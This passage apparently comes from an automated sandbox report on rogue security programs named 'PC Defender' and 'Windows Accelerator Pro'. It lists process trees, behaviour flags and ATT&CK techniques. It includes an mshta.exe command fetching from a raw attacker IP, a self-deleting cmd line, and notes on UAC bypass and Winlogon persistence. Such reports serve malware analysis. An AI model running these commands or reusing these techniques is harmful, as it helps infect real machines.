      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2908)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2264)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5280 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses

    C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe (PID 1324)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5600 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3512)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3976 /prefetch:8

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4140)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1284)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4848 /prefetch:8
      - NTFS ADS
      - Suspicious behavior: EnumeratesProcesses

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 916)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 768)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3384 /prefetch:8
      - NTFS ADS
      - Suspicious behavior: EnumeratesProcesses

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4260)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6280 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3316)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1544)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 556)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6616 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 6112)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 6136)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1716,7906347618641020897,9420967643751490755,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3048 /prefetch:8
      - NTFS ADS
      - Suspicious behavior: EnumeratesProcesses

C:\Windows\System32\CompPkgSrv.exe (PID 2528)
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe (PID 1444)
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\rundll32.exe (PID 904)
  Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\AppData\Local\Temp\Temp1_PC Defender (1).zip\[email protected] (PID 912)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Temp1_PC Defender (1).zip\[email protected]"
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx

    C:\Windows\SysWOW64\msiexec.exe (PID 4972)
      Command line: "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PCDefenderSilentSetup.msi"
      - Enumerates connected drives
      - System Location Discovery: System Language Discovery
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow

C:\Windows\system32\msiexec.exe (PID 4452)
  Command line: C:\Windows\system32\msiexec.exe /V
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\srtasks.exe (PID 1284)
      Command line: C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

    C:\Windows\syswow64\MsiExec.exe (PID 792)
      Command line: C:\Windows\syswow64\MsiExec.exe -Embedding C5A20BDBB329C16FCB4FD33F41577BAE E Global\MSI0000
      - Modifies WinLogon for persistence
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS

C:\Windows\system32\vssvc.exe (PID 1648)
  Command line: C:\Windows\system32\vssvc.exe
  - Checks SCSI registry key(s)
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\svchost.exe (PID 1532)
  Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc

C:\Users\Admin\AppData\Local\Temp\Temp1_Windows Accelerator Pro.zip\[email protected] (PID 5720)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Temp1_Windows Accelerator Pro.zip\[email protected]"
  - System Location Discovery: System Language Discovery
  - NTFS ADS
  - Suspicious use of SetWindowsHookEx

    C:\Users\Admin\AppData\Roaming\guard-wojl.exe (PID 3624)
      Command line: C:\Users\Admin\AppData\Roaming\guard-wojl.exe
      - Modifies WinLogon for persistence
      - UAC bypass
      - Event Triggered Execution: Image File Execution Options Injection
      - Executes dropped EXE
      - Checks whether UAC is enabled
      - Drops file in System32 directory
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of SendNotifyMessage
      - Suspicious use of SetWindowsHookEx
      - System policy modification

        C:\Windows\SysWOW64\mshta.exe (PID 5648)
          Command line: mshta.exe "http://93.115.82.248/?0=1&1=1&2=9&3=i&4=9200&5=1&6=1111&7=texyhekisb"
          - Blocklisted process makes network request
          - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\cmd.exe (PID 3292)
      Command line: "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\TEMP1_~2.ZIP\ENDERM~1.EXE" >> NUL
      - System Location Discovery: System Language Discovery

C:\Windows\system32\LogonUI.exe (PID 5932)
  Command line: "LogonUI.exe" /flags:0x4 /state0:0xa39c5055 /state1:0x41c64e6d
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe (PID 5740)
  Command line: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe (PID 5480)
  Command line: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
(Counts in parentheses are the number of matching signatures for each technique and sub-technique.)
Persistence
- Boot or Logon Autostart Execution (1): Winlogon Helper DLL (1)
- Event Triggered Execution (1): Image File Execution Options Injection (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1): Winlogon Helper DLL (1)
- Event Triggered Execution (1): Image File Execution Options Injection (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Impair Defenses (1): Disable or Modify Tools (1)
- Indicator Removal (1): File Deletion (1)
- Modify Registry (3)
Downloads